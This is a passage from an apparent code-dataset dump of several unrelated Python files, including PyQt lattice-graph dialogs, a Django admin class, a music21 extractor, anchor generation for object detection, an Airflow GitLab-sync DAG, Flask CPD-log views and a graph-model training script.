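print(element_to_prefs(root))   # (40.0, [{'label': 'type 0', 'bool': 'True', 'color': '#00aaff'}])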
\n # \"overload\" colorBtn \n for btnItem in [self.btn_backColor,\n self.btn_latticeColor,\n self.btn_activateColor]: \n self.hbox_colors.removeWidget(btnItem)\n btnItem.setParent(None)\n btnItem.deleteLater()\n \n self.btn_backColor = QColorButton()\n self.hbox_colors.insertWidget(1,self.btn_backColor)\n self.btn_latticeColor = QColorButton()\n self.hbox_colors.insertWidget(4,self.btn_latticeColor)\n self.btn_activateColor = QColorButton()\n self.hbox_colors.insertWidget(7,self.btn_activateColor) \n\n # \"overload\" edgePref/vertPref \n for prefItem in [self.edgePref, self.vertPref]: \n self.hbox_pref.removeWidget(prefItem)\n prefItem.setParent(None)\n prefItem.deleteLater()\n self.edgePref = QGraphElemPreference(\"Edges\")\n self.hbox_pref.addWidget(self.edgePref)\n self.vertPref = QGraphElemPreference(\"Vertices\")\n self.hbox_pref.addWidget(self.vertPref)\n \n def set_theme_ET(self, THEME):\n '''initialize preference widget according to THEME ElementTree''' \n\n self.checkBox_arrows.setChecked(THEME.find(\"VISIBLEARROWS\").get(\"value\") == \"True\")\n self.checkBox_lattice.setChecked(THEME.find(\"VISIBLELATTICE\").get(\"value\") == \"True\")\n self.btn_backColor.set_color(THEME.find(\"COLORBACKGROUND\").get(\"value\"))\n self.btn_latticeColor.set_color(THEME.find(\"COLORLATTICE\").get(\"value\"))\n self.btn_activateColor.set_color(THEME.find(\"COLORACTIVATE\").get(\"value\"))\n self.edgePref.set_data_ET(THEME.find(\"EDGES\"))\n self.vertPref.set_data_ET(THEME.find(\"VERTICES\"))\n \n def get_current_theme_ET(self):\n '''get xml ElementTree containing setting data in preference widget'''\n \n THEME = ET.Element(\"THEME\")\n THEME.set('name',self.curent_theme_name)\n \n tagsList = [\"VISIBLEARROWS\",\"VISIBLELATTICE\", \n \"COLORBACKGROUND\",\"COLORLATTICE\",\"COLORACTIVATE\"]\n getValList = [self.checkBox_arrows.isChecked(),self.checkBox_lattice.isChecked(), \n self.btn_backColor._color, self.btn_latticeColor._color, self.btn_activateColor._color]\n\n for tag, val in zip(tagsList,getValList): \n item = ET.Element(tag)\n item.set('value',str(val))\n THEME.append(item)\n \n THEME.append(self.edgePref.get_data_ET(\"EDGES\"))\n THEME.append(self.vertPref.get_data_ET(\"VERTICES\"))\n \n return DealXML.prettify(THEME)\n \nclass MyDialogPreferences(DialogPreferences):\n '''Preference manager dialog used for setting up mpl manipulation pane'''\n \n def __init__(self, parent):\n DialogPreferences.__init__(self, parent = parent,\n WidgetPreferencesClass = MyWidgetPreferences)\n \n\n# classes for manipulating edges relating to their length\n\n\nclass QDistListItemWidget(QWidget, Ui_myDistListItem):\n '''widget for setting listWidget parameters: bool, type, dist, err'''\n\n def __init__ (self, parent=None):\n super(QDistListItemWidget, self).__init__(parent)\n self.setupUi(self)\n \n self.lineEdit_dist.textEdited.connect(self.activate_checkbox)\n self.lineEdit_err.textEdited.connect(self.activate_checkbox)\n self.spinBox.valueChanged.connect(self.activate_checkbox)\n \n def activate_checkbox(self):\n self.checkBox.setChecked(True)\n \n def set_data(self, data, strFlag=False):\n \n if data.get(\"bool\") is not None: self.checkBox.setChecked(data[\"bool\"])\n if data.get(\"type\") is not None: self.spinBox.setValue(data[\"type\"])\n if data.get(\"dist\") is not None: self.lineEdit_dist.setText(str(data[\"dist\"]))\n if data.get(\"err\") is not None: self.lineEdit_err.setText(str(data[\"err\"]))\n if data.get(\"found\") is not None: self.set_found(data[\"found\"])\n \n def get_data(self): \n\n data = 
{\"bool\":self.checkBox.isChecked(), \"type\":self.spinBox.value(),\n \"dist\":self.get_dist(), \"err\":float(self.lineEdit_err.text())} \n \n return data \n \n def get_dist(self):\n srtDist = self.lineEdit_dist.text()\n return 0 if srtDist == \"\" else float(srtDist) \n \n def set_found(self, val): \n self.label_found.setText(\"{} edges found\".format(val))\n \n \nclass MyDistToolBox(QCustomListWidget_Add):\n '''toolBox for manipulating edges by their length'''\n \n def __init__ (self, default_data = []):\n '''''' \n super(MyDistToolBox, self).__init__(QDistListItemWidget, default_data)\n \n sizePolicy = QSizePolicy(QSizePolicy.Maximum,QSizePolicy.Fixed)\n text = \"Provide edges type, distance between atoms, and tolerance (%):\"\n self.label = QLabel(text)\n self.label.setSizePolicy(sizePolicy)\n self.vbox.insertWidget(0,self.label)\n self.vbox.removeWidget(self.btnAdd) \n self.btnAdd.setText(\"+\")\n self.btnAdd.setSizePolicy(sizePolicy)\n self.btnAdd.setMaximumWidth(40) \n self.btnRemove = QPushButton(\"-\")\n self.btnRemove.setSizePolicy(sizePolicy)\n self.btnRemove.setMaximumWidth(40) \n self.btnSearch = QPushButton(\"Search\")\n self.btnClose = QPushButton(\"Close\")\n self.btnSearch.setDefault(True)\n \n hbox = QHBoxLayout()\n hbox.addWidget(self.btnAdd)\n hbox.addWidget(self.btnRemove)\n hbox.addStretch(1)\n hbox.addWidget(self.btnSearch)\n hbox.addWidget(self.btnClose)\n \n self.vbox.addLayout(hbox)\n\n self.btnRemove.clicked.connect(self.remove_item_callback)\n \n def remove_item_callback(self):\n for item in self.listWidget.selectedItems():\n self.listWidget.takeItem(self.listWidget.row(item))\n\n\nclass DialogDistSearch(QDialog, MyDistToolBox):\n '''dialog for manipulating edges relating to their length'''\n \n def __init__(self, parent):\n \n super(DialogDistSearch, self).__init__()\n self.setAttribute(Qt.WA_DeleteOnClose)\n \n self.parent = parent\n self.update()\n \n self.vbox.setContentsMargins(9,15,9,9)\n self.vbox.setSpacing(10)\n self.setWindowTitle(\"Manipulate the edges relating to their length\")\n \n self.listWidget.currentItemChanged.connect(self.selectDistList_callback) \n self.parent.selectedEdgeChanged.connect(self.selectEdgeSignal_slot)\n self.parent.unitCellChanged.connect(self.update)\n self.btnSearch.clicked.connect(self.search_callback)\n self.btnClose.clicked.connect(self.close_callback)\n \n QShortcut(QKeySequence(\"Del\"), self, self.parent.gee.delete_active_edge_callback)\n QShortcut(QKeySequence(\"Shift+Del\"), self, self.parent.gee.clearEdges_callback)\n\n def update(self):\n '''update listWidget'''\n\n self.initialization = True # block QListWidget valuechanged callback\n \n # read data from parent unitcell\n init_data = []\n for length, ids in self.parent.UC.lengthDic.items():\n init_data.append({\"bool\": True, \n \"type\":self.parent.UC.edges[ids[0]].type, \n \"dist\":length,\n \"err\":1,\n \"found\":len(ids)})\n init_data.append({}) # add one empty item\n self.listWidget.set_data(init_data)\n # select empty item (the last)\n lastItemID = self.listWidget.count() - 1\n self.listWidget.setCurrentItem(self.listWidget.item(lastItemID)) \n \n # create binding dictionaries\n self.distToListItem, self.itemIDToDist = {}, {}\n for j in range(self.listWidget.count()):\n self.distToListItem[init_data[j].get(\"dist\")] = self.listWidget.item(j)\n self.itemIDToDist[j] = init_data[j].get(\"dist\")\n \n self.initialization = False # relieze QListWidget valuechanged callback\n \n def search_callback(self):\n '''searching edges by their length given in 
listWidget'''\n \n self.parent.UC.clearEdges()\n \n for dataDic in self.listWidget.get_data():\n if (dataDic is not None) and dataDic[\"bool\"]:\n search = self.parent.cluster.edges.search_edges_by_dist\n search(dataDic[\"type\"], dataDic[\"dist\"], dataDic[\"err\"])\n \n # show message \n dist = dataDic[\"dist\"]\n edgesList = self.parent.UC.lengthDic.get(dist)\n num = 0 if edgesList is None else len(edgesList)\n msg = ' {0} edges were found with dist={1:.3f}'.format(num,dist) \n self.parent.statusBar().showMessage(msg, 2000)\n if self.parent.TEXT_MODE:\n print(msg)\n\n # make chnages on mpl_pane\n self.parent.gee.create_artists_graph()\n self.parent.gee.set_artists_properties()\n self.parent.unitCellChanged.emit()\n self.parent.selectedEdgeChanged.emit(None)\n \n def selectDistList_callback(self, selectedItem):\n '''select edges from listWidget according to their length'''\n \n if not self.initialization:\n activeDist = self.itemIDToDist[self.listWidget.row(selectedItem)]\n if activeDist is None:\n self.edgesIDs = []\n else:\n self.edgesIDs = self.parent.UC.lengthDic[activeDist][:]\n \n self.parent.gee.select_edges(self.edgesIDs)\n \n if activeDist is None:\n msg = \" active edges unselected\"\n else:\n msg = \" selected {0} edges with length: {1}\".format(len(self.edgesIDs), activeDist)\n\n self.parent.statusBar().showMessage(msg, 2000)\n \n if self.parent.TEXT_MODE:\n print(msg)\n \n def add_item_callback(self):\n '''add item to the list toolbox'''\n MyDistToolBox.add_item_callback(self)\n self.itemIDToDist[self.listWidget.count()-1] = None\n\n def remove_item_callback(self):\n '''remove item from the list toolbox'''\n self.parent.gee.delete_active_edge_callback()\n \n def selectEdgeSignal_slot(self, activeEdge_id):\n '''when edge is selected at maniplation mpl_pane'''\n \n if activeEdge_id is None:\n dist = None\n else:\n dist = self.parent.UC.edges[activeEdge_id].length\n \n activeItem = self.distToListItem[dist]\n self.listWidget.setCurrentItem(activeItem)\n \n def close_callback(self):\n '''overload close in order to stop distEdge interaction mode'''\n self.parent.gee.select_edges([])\n self.reject()\n \n def closeEvent(self, evnt):\n '''overload close in order to stop distEdge interaction mode'''\n self.parent.gee.select_edges([])\n super(DialogDistSearch, self).closeEvent(evnt)\n \n \n#############################################################################\n\n\nif __name__ == '__main__':\n\n # test classes \n \n from core import Vertex, Edge\n import matplotlib.pyplot as plt\n \n # imports requied PyQt modules\n if pyQtVersion == \"PyQt4\":\n from PyQt4.QtCore import QObject\n from PyQt4.QtGui import QApplication\n else:\n from PyQt5.QtCore import QObject\n from PyQt5.QtWidgets import QApplication\n \n import sys\n \n \n class TestMainWindow(QObject):\n '''class for testing interaction of dialogs with MainWindow'''\n \n selectedEdgeChanged = pyqtSignal(object)\n selectedEdgeChangedList = pyqtSignal(object) #when edge selected in QListWidget\n unitCellChanged = pyqtSignal()\n latticeVisibleChanged = pyqtSignal(object) # used to bind with mpl.event\n arrowsVisibleChanged = pyqtSignal(object) # used to bind with mpl.event\n \n class Label(object):\n def __init__(self): pass\n def setText(self, text): pass\n \n class RadioButton(object):\n def __init__(self): pass\n def setChecked(self, _bool): pass\n \n class statusBar(object):\n def __init__(self): pass\n def showMessage(msg=\"\", sec=2000): pass\n \n def __init__ (self):\n \n super(TestMainWindow, self).__init__()\n \n 
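# --- Editor's note: illustrative sketch, not part of the original file. ---
# search_edges_by_dist() lives elsewhere in the package; the dialog above only
# hands it a target length and a tolerance field labelled as a percentage. A
# plausible reading of that contract, with invented values:

def within_tolerance(length, dist, err_percent):
    return abs(length - dist) <= dist * err_percent / 100.0

candidate_lengths = [0.99, 1.0, 1.02, 1.5]
print([l for l in candidate_lengths if within_tolerance(l, 1.0, 2.0)])
# [0.99, 1.0, 1.02] under a 2% tolerance; 1.5 is rejected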
self.prefFileName = \"preferences.xml\"\n self.fileNameXML = None\n self.label_fileNameXML = None\n self.LATTICEGRAPH_name = \"testGraph\"\n self.label_fileNameXML = self.Label()\n self.label_LG_name = self.Label()\n \n self.SETTINGS = ET.parse(self.prefFileName).getroot()\n self.CURRENT_THEME = DealXML.get_child_by_name(self.SETTINGS,\"THEME\",\"Current theme\") \n self.TEXT_MODE = True\n self.radioButton_output = self.RadioButton()\n \n basisMatrix = np.array([[1,0,0],[0,1,0],[0,0,1.3]])\n self.lattice = Lattice(basisMatrix=basisMatrix) \n self.UC = UnitCell(self.lattice)\n self.UC.add_vertex(Vertex(0,0,[0.2,0.2,0.2]))\n self.UC.add_vertex(Vertex(0,0,[0.3,0.3,0.6]))\n self.UC.add_edge(Edge(0,1,(1,2),(0,0,0)))\n self.UC.add_edge(Edge(0,2,(2,1),(0,0,1)))\n self.UC.add_edge(Edge(0,0,(1,1),(1,0,0)))\n self.UC.add_edge(Edge(0,0,(1,1),(0,1,0)))\n self.UC.add_edge(Edge(0,0,(2,2),(1,0,0)))\n self.UC.add_edge(Edge(0,0,(2,2),(0,1,0)))\n self.size = (2,2,2)\n self.cluster = CrystalCluster(self.UC, self.lattice, self.size)\n \n fig = plt.figure('Graph edges editor', figsize = (6,6))\n self.ax = fig.gca(projection='3d')\n self.gee = GraphEdgesEditor(self.ax, self.cluster, parent = self, \n display_report = True)\n self.canvas = fig.canvas\n plt.show()\n self.que = []\n \n def getFileLabelText(self):\n return \"None\"\n \n def importXml(self, LG_name):\n \n if self.parser is None:\n raise ValueError(\"Parser is not defined\")\n self.lattice, self.UC = self.parser.parse_LATTICEGRAPH(self.LATTICEGRAPH_name)\n self.cluster = CrystalCluster(self.UC, self.lattice, self.size)\n self.ax.clear()\n self.gee = GraphEdgesEditor(self.ax, self.cluster, parent = self, \n display_report = True)\n self.canvas.draw()\n \n # test methonds\n \n def addToQue(self, myQlg):\n '''used to show dialogs in sequence while not blocking the mainWindow'''\n \n if len(self.que) == 0:\n self.showFromQue(myQlg)\n else:\n self.que[-1].rejected.connect(lambda: self.showFromQue(myQlg))\n \n self.que.append(myQlg)\n \n def showFromQue(self, myQlg): \n print(\"\\n# run {} test\".format(type(myQlg)))\n myQlg.show()\n \n def testDialog(self, QDlg):\n '''testing interaction of QDlg with MainWindow'''\n self.myQDlg = QDlg(self) #pass parent\n self.addToQue(self.myQDlg)\n \n def testQPreferencesManager(self):\n \n def applyPref_callback():\n '''when apply button is cklicked in DialogPreferences'''\n self.gee.initialize_theme(self.CURRENT_THEME)\n self.gee.set_artists_properties()\n \n self.myQDlg = MyDialogPreferences(parent = self)\n self.myQDlg.applySignal.connect(applyPref_callback)\n self.addToQue(self.myQDlg) \n \n def testQDialogExportAnim(self):\n \n from widgets.QDialogExportAnim import DialogExportAnim\n self.myQDlg = DialogExportAnim(self.ax)\n self.myQDlg.stop_callback()\n if len(self.que) == 0:\n self.myQDlg.start_callback()\n else:\n self.que[-1].rejected.connect(self.myQDlg.start_callback)\n self.addToQue(self.myQDlg) \n \n \n def showInDialog(widget):\n '''used for displaying widgets in dialog during test'''\n \n dlg = QDialog()\n widget.setParent(dlg)\n vbox = QHBoxLayout()\n vbox.setContentsMargins(0, 0, 0, 0)\n vbox.setSpacing(0)\n vbox.addWidget(widget)\n dlg.setLayout(vbox)\n dlg.exec_()\n \n \n def test_QGraphElemPreference():\n '''testing interaction with QGraphElemPreference via ElementTree object'''\n \n print(\"\\n# run {} test\\n\".format(QGraphElemPreference))\n \n myQGraphElemPreference = QGraphElemPreference(\"Vertices\")\n elem = myQGraphElemPreference.get_data_ET(\"VERTICES\") # get ET from widget\n \n print(\" 
myQGraphElemPreference.get_data_ET() test\\n\")\n ET.dump(DealXML.prettify(elem))\n myQGraphElemPreference.set_data_ET(elem) # initialize widget with ET\n \n showInDialog(myQGraphElemPreference)\n \n def test_MyWidgetPreferences():\n '''testing interaction with MyWidgetPreferences via ElementTree object'''\n \n print(\"\\n# run {} test\\n\".format(MyWidgetPreferences))\n \n myWidgetPreferences = MyWidgetPreferences()\n\n xmlText = '''\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n'''\n THEME = ET.fromstring(xmlText) \n \n print(\" MyWidgetPreferences.set_theme_ET() test\\n\")\n myWidgetPreferences.set_theme_ET(THEME)\n print(\" MyWidgetPreferences.get_current_theme_ET() test\\n\")\n ET.dump(myWidgetPreferences.get_current_theme_ET()) # get ET from widget\n \n showInDialog(myWidgetPreferences)\n \n \n def run_test():\n \n print(\"\\n {} is imported\".format(pyQtVersion))\n \n app = QApplication([])\n \n # creating TestDialogDistSearch\n myTestMainWindow = TestMainWindow()\n \n # testing\n myTestMainWindow.testDialog(DialogImportCryst)\n# myTestMainWindow.testDialog(DialogEditXML)\n# myTestMainWindow.testDialog(DialogDistSearch)\n \n# test_QGraphElemPreference()\n# test_MyWidgetPreferences()\n# myTestMainWindow.testQPreferencesManager()\n \n# myTestMainWindow.testQDialogExportAnim()\n \n sys.exit(app.exec_())\n\n############################################################################\n \n run_test()\n\n","repo_name":"luchko/latticegraph_designer","sub_path":"latticegraph_designer/app/dialogs.py","file_name":"dialogs.py","file_ext":"py","file_size_in_byte":49775,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"99"} +{"seq_id":"20545270405","text":"from django.contrib.auth.admin import UserAdmin\nfrom django.contrib import admin\nfrom . 
import models\n\n\n\n# Register your models here.\n\n# 관리자 페이지에서 모델User를 관리 할수있는 클래스 설정\n# 9번 줄은 10번 클래스가 동작할수있게하는 부분\n# list_display는 행으로 보이고자하는거, \n# list_filter는 조건에 따라 선택적인 내용만 얻을 수있게 도와주는애\n@admin.register(models.User)\nclass CustomUserAdmin(UserAdmin):\n \n \"\"\"Custom User Admin\"\"\"\n\n fieldsets = UserAdmin.fieldsets +(\n (\n \"Custom Profile\",\n {\n \"fields\":(\n \"avatar\",\n \"gender\",\n \"bio\",\n \"birthdate\",\n \"language\",\n \"currency\",\n \"superhost\",\n )\n }\n ),\n )\n","repo_name":"t08361/airbnb-clone","sub_path":"users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"20264800197","text":"import play\nimport random\nimport string\nimport numpy as np\n\nfrom music21 import *\nfrom os import sys, walk\n\ndef fix(freq):\n notes = play.get_piano_notes()\n res = ''\n for x in notes.keys():\n if (abs(notes[x]-freq) < abs(notes[res]-freq)):\n res = x\n return res\n\ndef trans(dura_type):\n if (dura_type == 'whole'):\n return 32\n elif (dura_type == 'half'):\n return 16\n elif (dura_type == 'quarter'):\n return 8\n elif (dura_type == 'eighth'):\n return 4\n elif (dura_type == '16th'):\n return 2\n elif (dura_type == '32nd'):\n return 1\n print (dura_type)\n return None\n\nsys.stdout = open(\"data.txt\", \"w\")\n\nfor (_, __, file) in walk('./xml'):\n for s in file:\n if (s[0] == '.'):\n continue\n\n b = converter.parse('./xml/' + s)\n TS = b.recurse().getElementsByClass('TimeSignature')[0]\n\n if (TS.ratioString != '4/4'):\n continue\n\n cases = 6\n __collect = []\n print ('Loading from ' + s)\n\n while (cases > 0):\n flag = True\n __note = []\n __dura = []\n\n PN = random.randint(0, 1)\n MN = random.randint(0, len(b.getElementsByClass(stream.Part)[PN].getElementsByClass(stream.Measure)) - 5)\n \n for m in range(MN, MN + 4):\n total = 0\n for n in b.getElementsByClass(stream.Part)[PN].getElementsByClass(stream.Measure)[m]:\n\n interval = 0\n if (type(n) == note.Note):\n __note.append(fix(n.pitch.frequency))\n interval = trans(n.duration.type)\n __dura.append(32 // interval)\n elif (type(n) == note.Rest):\n __note.append('')\n interval = trans(n.duration.type)\n __dura.append(32 // interval)\n elif (n.duration.type != 'zero'):\n flag = False\n total += interval\n \n if ((not flag)):\n break\n if (total != 32):\n __note.append('')\n __dura.append(32 / (32 - total))\n\n if (not flag):\n continue\n\n cases -= 1\n __collect.append((__note, __dura))\n\n for d in range(2):\n for i in range(len(__collect)):\n print (__collect[i][d], ',')\n print ()\n print ()\n","repo_name":"PisonJay/GeneMusic","sub_path":"read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"31841877004","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np \nimport tensorflow as tf\n\nclass Anchor(object):\n\n def __init__(self, base_size = 16, ratios=[0.5,1,2], scales=2**np.arange(3,6)):\n self._base_size = base_size\n self._ratios = ratios\n self._scales = scales\n self._anchors = []\n\n def generate(self):\n base_anchor = np.array([1,1,self._base_size, self._base_size]) - 1\n ratio_anchors = self._ratio_enum(base_anchor, self._ratios)\n self._anchors = np.vstack([self._scale_enum(ratio_anchors[i,:], self._scales) for i in range(ratio_anchors.shape[0])])\n 
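# --- Editor's note: illustrative usage sketch, not part of the original file. ---
# With the defaults above (base_size=16, ratios [0.5, 1, 2], scales
# 2**arange(3, 6) = [8, 16, 32]), generate() stacks one (x1, y1, x2, y2) box
# per ratio/scale pair, and generate_anchors() below tiles those boxes over an
# H x W feature map with stride 16, giving H * W * 9 anchors in total.

anchors = Anchor().generate()
print(anchors.shape)  # (9, 4): 3 ratios x 3 scales

# Note: the reference Faster R-CNN anchor code computes hs = np.round(ws * ratios)
# in its ratio enumeration; the extra np.sqrt() in _ratio_enum above changes the
# resulting aspect ratios and may be unintended.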
return self._anchors\n\n def _coords(self, anchor):\n w = anchor[2] - anchor[0] + 1\n h = anchor[3] - anchor[1] + 1\n x_center = anchor[0] + 0.5 * (w - 1)\n y_center = anchor[1] + 0.5 * (h - 1)\n return w, h, x_center, y_center\n\n def _ratio_enum(self, anchor, ratios):\n w, h, x_center, y_center = self._coords(anchor)\n size = w * h\n size_ratios = size / ratios\n ws = np.round(np.sqrt(size_ratios))\n hs = np.round(np.sqrt(ws * ratios))\n return self._make_anchors(ws,hs,x_center, y_center)\n\n def _make_anchors(self, ws, hs, x_center, y_center):\n ws = ws[:, np.newaxis]\n hs = hs[:, np.newaxis]\n return np.hstack((x_center - 0.5 * (ws - 1),\n y_center - 0.5 * (hs - 1),\n x_center + 0.5 * (ws - 1),\n y_center + 0.5 * (hs - 1)))\n \n def _scale_enum(self, anchor, scales):\n w, h, x_center, y_center = self._coords(anchor)\n ws = w * scales\n hs = h * scales\n return self._make_anchors(ws, hs, x_center, y_center)\n\n @staticmethod\n def generate_anchors_initial(height, width, stride=16, scales=(8,16,32), ratios=(0.5,1,2)):\n shift_x = tf.range(width) * stride\n shift_y = tf.range(height) * stride\n shift_x, shift_y = tf.meshgrid(shift_x,shift_y)\n sx = tf.reshape(shift_x, shape=(-1,))\n sy = tf.reshape(shift_y, shape=(-1,))\n shifts = tf.transpose(tf.stack([sx,sy,sx,sy]))\n K = tf.multiply(width,height)\n shifts = tf.transpose(tf.reshape(shifts, shape=[1,K,4]),perm=(1,0,2))\n a = Anchor(ratios=np.array(ratios),scales=np.array(scales))\n anchors = a.generate()\n A = anchors.shape[0]\n anchor_constant = tf.constant(anchors.reshape((1,A,4)), dtype=tf.int32)\n length = K * A\n result = tf.reshape(tf.add(anchor_constant, shifts), shape=(length, 4))\n return tf.cast(result, dtype=tf.float32), length\n\n @staticmethod\n def generate_anchors(height, width, stride=16, scales=(8,16,32), ratios=(0.5,1,2)):\n a = Anchor(ratios=np.array(ratios), scales=np.array(scales))\n anchors = a.generate()\n A = anchors.shape[0]\n shift_x = np.arange(0, width) * 16\n shift_y = np.arange(0, height) * 16\n shift_x, shift_y = np.meshgrid(shift_x, shift_y)\n shifts = np.vstack((shift_x.ravel(), shift_y.ravel(), shift_x.ravel(), shift_y.ravel())).transpose()\n K = shifts.shape[0]\n anchors = anchors.reshape((1,A, 4)) + shifts.reshape((1,K,4)).transpose((1,0,2))\n anchors = anchors.reshape((K * A, 4)).astype(np.float32, copy=False)\n length = np.int32(anchors.shape[0])\n return anchors, length\n\n ","repo_name":"ltenny/rsna","sub_path":"utils/anchor.py","file_name":"anchor.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"70278075206","text":"import pendulum\nfrom airflow.decorators import dag, task\nfrom airflow.models import Variable\nfrom airflow.providers.postgres.hooks.postgres import PostgresHook\nfrom airflow.providers.postgres.operators.postgres import PostgresOperator\n\nfrom update_gitlab_issues import update_issues\n\n\n@task\ndef load_issues_from_api():\n base_url = Variable.get('GITLAB_URL')\n token = Variable.get('GITLAB_API_TOKEN')\n\n pg_hook = PostgresHook(postgres_conn_id='KabanPostgres')\n\n with pg_hook.get_conn() as pg_conn:\n update_issues(base_url=base_url, token=token, pg_conn=pg_conn)\n\n\n@dag(\n schedule_interval=\"@hourly\",\n start_date=pendulum.datetime(2022, 12, 23, tz=\"Europe/Moscow\"),\n is_paused_upon_creation=True,\n catchup=False,\n tags=[\"Kaban\"],\n)\ndef update_issues_status_dag():\n\n load_task = load_issues_from_api()\n\n update_issues_status_task = PostgresOperator(\n 
task_id='update_issues_status',\n sql='sql/update_issues_status_info.sql',\n postgres_conn_id='KabanPostgres',\n )\n\n update_issues_status_task.set_upstream(load_task)\n\n\nupdate_issues_status_dag()\n","repo_name":"Jud1cator/Kaban","sub_path":"dags/update_issues_status_dag.py","file_name":"update_issues_status_dag.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"99"} +{"seq_id":"9587278327","text":"import json\r\n\r\nimport pandas as pd\r\nimport plotly\r\nimport plotly.express as px\r\nfrom flask import Flask, redirect, render_template, url_for, request\r\n\r\nfrom .activity import Activity\r\nfrom .logfile import load_logfile, save_logfile\r\nfrom .summary import get_cpd_summary\r\n\r\napp = Flask(__name__)\r\n\r\n\r\ndef build_quarters_graph_json(quarter_totals: dict):\r\n df = pd.DataFrame(list(quarter_totals.items()), columns=[\"Quarter\", \"Hours\"])\r\n fig = px.bar(df, x=\"Quarter\", y=\"Hours\")\r\n fig.add_shape(\r\n type=\"line\",\r\n xref=\"paper\",\r\n x0=0,\r\n x1=1,\r\n yref=\"y\",\r\n y0=12.5,\r\n y1=12.5,\r\n line=dict(color=\"Red\", dash=\"dot\"),\r\n )\r\n return json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\r\n\r\n\r\ndef build_types_graph_json(cpd_type_totals: dict):\r\n df = pd.DataFrame(list(cpd_type_totals.items()), columns=[\"CPD Type\", \"Hours\"])\r\n fig = px.bar(df, y=\"CPD Type\", x=\"Hours\", orientation=\"h\")\r\n return json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\r\n\r\n\r\n@app.route(\"/\")\r\ndef home():\r\n logfile = app.config[\"logfile\"]\r\n activities = load_logfile(logfile)\r\n summary = get_cpd_summary(logfile, years=3)\r\n summary2 = get_cpd_summary(logfile, years=2)\r\n expiring = summary[\"total_hours\"] - summary2[\"total_hours\"]\r\n quarters_graph_json = build_quarters_graph_json(summary[\"quarter_totals\"])\r\n types_graph_json = build_types_graph_json(summary[\"cpd_type_totals\"])\r\n return render_template(\r\n \"index.html\",\r\n logfile=logfile,\r\n activities=activities,\r\n summary=summary,\r\n expiring=expiring,\r\n quarters_graph_json=quarters_graph_json,\r\n types_graph_json=types_graph_json,\r\n )\r\n\r\n\r\n@app.route(\"/new_activity\", methods=[\"POST\"])\r\ndef new_activity():\r\n \"\"\"Create new CPD activity\"\"\"\r\n logfile = app.config[\"logfile\"]\r\n act = Activity(\r\n act_date=request.form[\"date\"],\r\n topic=request.form[\"topic\"],\r\n cpd_hours=request.form[\"duration\"],\r\n cpd_type=request.form[\"cpd_category\"],\r\n technical=request.form[\"technical\"],\r\n provider=request.form[\"provider\"],\r\n learning_outcome=request.form[\"learning_outcome\"],\r\n notes=request.form[\"notes\"],\r\n )\r\n save_logfile(logfile, activities=[act], append=True)\r\n return redirect(url_for(\"home\"))\r\n","repo_name":"aguinane/CPDLog","sub_path":"cpdlog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"6378511833","text":"\ndef sortzeroonetwo(arr,n):\n next=0\n for i in range(n):\n if arr[i]==0:\n temp=arr[i]\n arr[i]=arr[next]\n arr[next]=temp\n next+=1\n \n for j in range(next,n):\n if arr[j]==1:\n temp=arr[j]\n arr[j]=arr[next]\n arr[next]=temp\n next+=1\n\n\n\n\n\n\n# taking input\nsize=int(input(\"Enter size of list : \"))\nprint(\"input list \")\nlist=input().split()\n\narr=[]\n\nfor i in range(size):\n arr.append(int(list[i]))\n\n# calling 
finction\n\nsortzeroonetwo(arr,size)\nprint(arr)","repo_name":"Lalitmax/Basics_Of_Python","sub_path":"class practice question/Sort 0 1 3 .py","file_name":"Sort 0 1 3 .py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"8756643994","text":"import argparse\nimport os.path\nimport traceback\nfrom contextlib import nullcontext\nfrom datetime import datetime\nfrom types import SimpleNamespace\nfrom typing import Any, Tuple\nimport re\n\nimport torch\nimport torch.nn.functional as F\nimport wandb\nfrom torch_geometric.loader import DataLoader\nfrom torch_geometric.nn import GCNConv, GATConv\nfrom tqdm import tqdm\n\nimport custom_logger\nimport datasets\nfrom custom_logger import log\nfrom decoders import AdjGenerationType, FullyConnectedMessagePassingDecoder\nfrom graph_senn import GraphSENN\nfrom pooling_layers import StandardPoolingLayer, GraphSENNPool\n\nCONV_TYPES = [GCNConv, GATConv]\n\ndef train_test_epoch(train: bool, model: GraphSENN, optimizer, loader: DataLoader, epoch: int, mode_str: str):\n if train:\n model.train()\n else:\n model.eval()\n correct = 0\n sum_loss = 0\n sum_class_loss = 0\n sum_reg_loss = 0\n sum_add_loss = {}\n num_classes = model.output_dim\n class_counts = torch.zeros(num_classes)\n with nullcontext() if train else torch.no_grad():\n for data in loader:\n data = data.to(custom_logger.device)\n batch_size = data.y.size(0)\n if train:\n optimizer.zero_grad()\n\n annotations = data.annotations if hasattr(data, \"annotations\") else None\n out, x_out, theta, h = model(data.x, data.edge_index, data.batch, annotations)\n target = data.y\n classification_loss = F.nll_loss(out, target)\n reg_loss, add_loss_dict = model.pooling_layer.calculate_additional_losses(model, data.x, x_out, data.batch,\n data.edge_index, theta, h,\n batch_size)\n\n loss = classification_loss + reg_loss\n if torch.isnan(loss).item():\n raise ValueError(\"NaN encountered during training!\")\n\n sum_loss += batch_size * float(loss)\n sum_class_loss += batch_size * classification_loss\n sum_reg_loss += batch_size * reg_loss\n for k, v in add_loss_dict.items():\n sum_add_loss[k] = sum_add_loss.get(k, 0) + batch_size * v\n\n pred_classes = out.argmax(dim=1)\n correct += int((pred_classes == target).sum())\n class_counts += torch.bincount(pred_classes.detach(), 